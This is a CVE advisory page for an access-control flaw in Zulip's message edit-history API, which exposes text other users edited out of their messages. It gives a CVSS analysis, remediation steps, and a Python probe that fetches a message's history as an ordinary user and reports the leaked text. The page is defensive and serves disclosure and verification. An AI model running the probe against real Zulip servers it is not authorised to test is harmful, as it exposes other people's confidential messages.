Description
Zulip is an open-source team collaboration tool. Prior to 12.0, with message_edit_history_visibility_policy set to "moves", /api/v1/messages/{id}/history still returns historical content values, allowing low-privilege users to recover text that was edited away from other users' messages. This vulnerability is fixed in 12.0.
Published: 2026-05-12
Score: 6 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Zulip lets users edit messages and gives organization administrators a realm setting, message_edit_history_visibility_policy, that controls who may view edit history. Setting it to "moves" is meant to expose only message moves (topic and channel changes) and withhold the previous text of content edits. In versions prior to 12.0 the /api/v1/messages/{id}/history endpoint still returned historical content values under that policy, so any user able to read a message could retrieve text that another user had edited out of it, including sensitive or confidential information. The weakness is improper access control (CWE‑284): the policy was not applied to the content fields of the history response.

Affected Systems

The CVE description lists Zulip, the open‑source team collaboration tool, as affected in all releases before version 12.0. Exposure requires that the organization's message_edit_history_visibility_policy be set to "moves" (reflected as AT:P in the CVSS vector); the description does not report the "all" or "none" settings as affected. Deployment size and operating environment do not change the exposure.

Risk and Exploitability

The CVSS v4.0 base score is 6.0 (Medium): network reachable, low attack complexity, low privileges required, no user interaction, high confidentiality impact and no integrity or availability impact, with one attack requirement (AT:P), namely that the realm policy is set to "moves". No EPSS score has been assigned and the vulnerability is not listed in CISA's KEV catalog. An attacker needs only an ordinary account in the organization and a personal API key, which any user can obtain from their settings: calling GET /api/v1/messages/{id}/history for a message the account can read returns its history, including prior content values the policy should have withheld. Without an EPSS score the exploitation likelihood cannot be quantified from that source, but the preconditions are trivial to meet and the confidentiality impact warrants prompt remediation.

Generated by OpenCVE AI on May 12, 2026 at 17:35 UTC.

Remediation

The CVE description states that the issue is fixed in Zulip 12.0. No vendor‑published workaround is recorded on this page.

OpenCVE Recommended Actions

  • Upgrade Zulip to version 12.0 or later, where the "moves" policy is enforced on the content fields of the history endpoint's response.
  • Until the upgrade is possible, set message_edit_history_visibility_policy to "none" (organization settings, "Who can view edit history"), which is meant to disable edit history entirely and is not reported as affected, or block GET /api/v1/messages/*/history at the reverse proxy for all users. Verify either measure by requesting the history of a content‑edited message as an ordinary, non‑administrator user and confirming that no prior content is returned.
  • Treat text that was edited out of messages on a pre‑12.0 server with the "moves" policy as potentially exposed to every member who could read those messages, and remind users that editing a message is not deletion: under the "all" policy the previous text remains visible by design.
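As an added check for the disclosure described under Risk and Exploitability, and for verifying the interim measures listed above, the following script (written for this page; not Zulip project code) fetches a message's history as an ordinary user and reports any edited‑away text that the configured policy should have withheld. It assumes the endpoint's response shape (a message_history list, oldest entry first, where the first entry carries the original content and later entries carry content plus prev_content for a content edit and/or prev_topic or prev_stream for a move) and ships with a constructed sample response so the logic runs offline; the server URL, account, API key and message ID are placeholders.

```python
"""Probe for edited-away text disclosed through GET /api/v1/messages/{id}/history.

Added example for this page (not Zulip project code). Assumes the history
endpoint's response shape described in the lead-in; the sample response and
all connection details are constructed placeholders.
"""
import base64
import json
import os
import sys
import urllib.request

CONTENT_FIELDS = ("prev_content", "prev_rendered_content")
MOVE_FIELDS = ("prev_topic", "prev_stream")

# Constructed sample: a message whose text was edited to remove a sensitive
# line, then moved to another topic. Field names follow the assumed API shape.
SAMPLE_RESPONSE = {
    "result": "success",
    "msg": "",
    "message_history": [
        {"content": "Draft: merger closes Friday, do not share",
         "rendered_content": "<p>Draft: merger closes Friday, do not share</p>",
         "topic": "planning", "timestamp": 1700000000, "user_id": 10},
        {"content": "Draft: (details removed)",
         "rendered_content": "<p>Draft: (details removed)</p>",
         "prev_content": "Draft: merger closes Friday, do not share",
         "prev_rendered_content": "<p>Draft: merger closes Friday, do not share</p>",
         "timestamp": 1700000100, "user_id": 10},
        {"content": "Draft: (details removed)",
         "rendered_content": "<p>Draft: (details removed)</p>",
         "prev_topic": "planning", "topic": "general",
         "timestamp": 1700000200, "user_id": 11},
    ],
}


def classify_entries(history):
    """Label each history entry as 'original', 'content_edit', 'move',
    'content_and_move' or 'unknown' from the fields it carries."""
    labels = []
    for i, entry in enumerate(history):
        if i == 0:
            labels.append("original")
            continue
        edited = any(f in entry for f in CONTENT_FIELDS)
        moved = any(f in entry for f in MOVE_FIELDS)
        if edited and moved:
            labels.append("content_and_move")
        elif edited:
            labels.append("content_edit")
        elif moved:
            labels.append("move")
        else:
            labels.append("unknown")
    return labels


def leaked_content(response, policy):
    """Return the distinct edited-away text values the response discloses that
    the realm policy ('all', 'moves' or 'none') should have withheld.

    'all': content history is visible by design, so nothing is a leak.
    'moves': only moves should be visible, so every content or prev_content
    value other than the message's current text is a leak.
    'none': no history should be returned at all; the same content test is
    applied, which gives a lower bound on the over-disclosure."""
    history = response.get("message_history", [])
    if policy == "all" or not history:
        return []
    current = history[-1].get("content")  # newest entry holds the live text
    leaks = []
    for entry in history:
        for field in ("content", "prev_content"):
            value = entry.get(field)
            if value is not None and value != current and value not in leaks:
                leaks.append(value)
    return leaks


def fetch_history(site, email, api_key, message_id, timeout=10):
    """GET /api/v1/messages/{id}/history using Zulip's HTTP Basic auth
    (email:api_key). Network call; not exercised offline."""
    url = f"{site.rstrip('/')}/api/v1/messages/{int(message_id)}/history"
    token = base64.b64encode(f"{email}:{api_key}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


if __name__ == "__main__":
    # Usage: ZULIP_SITE=https://chat.example.com ZULIP_EMAIL=user@example.com \
    #        ZULIP_API_KEY=... python3 check_history.py <message_id> moves
    if len(sys.argv) != 3:
        print("usage: check_history.py <message_id> <all|moves|none>")
        sys.exit(2)
    data = fetch_history(os.environ["ZULIP_SITE"], os.environ["ZULIP_EMAIL"],
                         os.environ["ZULIP_API_KEY"], sys.argv[1])
    history = data.get("message_history", [])
    for label, entry in zip(classify_entries(history), history):
        print(label, entry.get("timestamp"))
    leaks = leaked_content(data, sys.argv[2])
    print("LEAK" if leaks else "ok", leaks)
    sys.exit(1 if leaks else 0)
```

Run it with a non‑administrator account against a message you know another user content‑edited: a LEAK line under the "moves" policy reproduces the disclosure, and an empty result after upgrading to 12.0, switching the policy to "none" or blocking the endpoint at the proxy confirms the fix or workaround for that message.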



Advisories

No advisories yet.

History

Tue, 12 May 2026 18:00:00 +0000

Type                 | Values Removed | Values Added
First Time appeared  |                | Zulip; Zulip zulip
Vendors & Products   |                | Zulip; Zulip zulip

Tue, 12 May 2026 16:45:00 +0000

Type         | Values Removed | Values Added
Description  |                | Zulip is an open-source team collaboration tool. Prior to 12.0, With message_edit_history_visibility_policy set to "moves", /api/v1/messages/{id}/history still returns historical content values, allowing low-privilege users to recover text that was edited away from other users' messages. This vulnerability is fixed in 12.0.
Title        |                | Zulip: Message edit history visible in "moves only" policy through /api/v1/messages/{id}/history
Weaknesses   |                | CWE-284
References   |                |
Metrics      |                | cvssV4_0: {'score': 6, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-12T16:33:02.829Z

Reserved: 2026-04-10T20:22:44.035Z

Link: CVE-2026-40300

Vulnrichment

No data.

NVD

Status : Received

Published: 2026-05-12T17:16:20.150

Modified: 2026-05-12T17:16:20.150

Link: CVE-2026-40300

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-12T17:45:20Z

Weaknesses